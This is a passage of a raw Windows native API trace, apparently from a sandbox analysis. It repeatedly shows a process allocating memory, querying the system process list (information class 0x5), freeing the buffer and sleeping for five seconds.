ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.285] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.301] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.308] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.316] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.332] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.341] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.349] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.364] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.372] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.380] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.429] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 